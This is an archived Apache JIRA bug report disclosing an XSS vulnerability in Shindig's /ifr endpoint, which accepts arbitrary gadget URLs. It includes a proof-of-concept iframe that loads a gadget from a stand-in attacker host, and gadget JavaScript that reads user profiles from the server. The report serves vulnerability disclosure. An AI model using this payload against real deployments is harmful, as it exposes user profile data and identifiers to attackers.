You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@shindig.apache.org by "M. van Cuijk (JIRA)" <ji...@apache.org> on 2013/01/29 10:11:13 UTC

[jira] [Created] (SHINDIG-1898) XSS vulnerability through /ifr

M. van Cuijk created SHINDIG-1898:
-------------------------------------

             Summary: XSS vulnerability through /ifr
                 Key: SHINDIG-1898
                 URL: https://issues.apache.org/jira/browse/SHINDIG-1898
             Project: Shindig
          Issue Type: Bug
            Reporter: M. van Cuijk


When a gadget contains JavaScript, it will be run in the domain context of the Shindig application, since the gadget is loaded through /ifr on the Shindig host. Therefore, gadgets are capable of doing HTTP requests to any URI on this host.

Loading a gadget through /ifr is controlled by the "url" query string parameter, but no restrictions are placed on the value of this parameter. Only the URL of gadgets that have previously been added to the container by the user should be allowed for this parameter. Any other URL should result in an error.

The current situation allows an attacker to trick a user into opening a website on any domain, including an iframe like this one:

<iframe src="https://shindighost/gadgets/ifr?url=http%3A%2F%2Fattackerhost%2Fexploit.gadget.xml&amp;container=default&amp;view=canvas&amp;nocache=1"></iframe>

Since the "url" parameter is not required to point to a gadget that has been added by the user, any URL is accepted. Any JavaScript code that is contained in the gadget is capable of doing HTTP requests to URIs under https://shindighost/, e.g. with code like this:

<Module>
	<ModulePrefs title="Exploit" description="P0wned!" author="Mark van Cuijk" width="60" height="140">
	</ModulePrefs>
	<Content type="html" view="canvas">
	<![CDATA[<!DOCTYPE html>
		<script type="text/javascript" src="https://shindighost/webresources/js/lib/jquery.min.js"></script>
		<script type="text/javascript">
			$(function() {
				$.ajax({
					url: 'https://shindighost/rest/userprofiles',
					success: function(d) {
						var t = d.length + ' profiles found.\n'
							+ 'First profile: '
							+ d[0].openId;
						window.alert(t);
					}
				});
			});
		</script>
	]]>
	</Content>
</Module>

Now, when an authenticated user is pointed to the URL containing the iframe above, the actual result is that a popup is displayed showing the total number of user profiles in the application server and the OpenID identifier of the first profile returned. The desired result is that no popup is displayed, because the gadget and therefore the JavaScript is not loaded in the iframe in the first place.

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira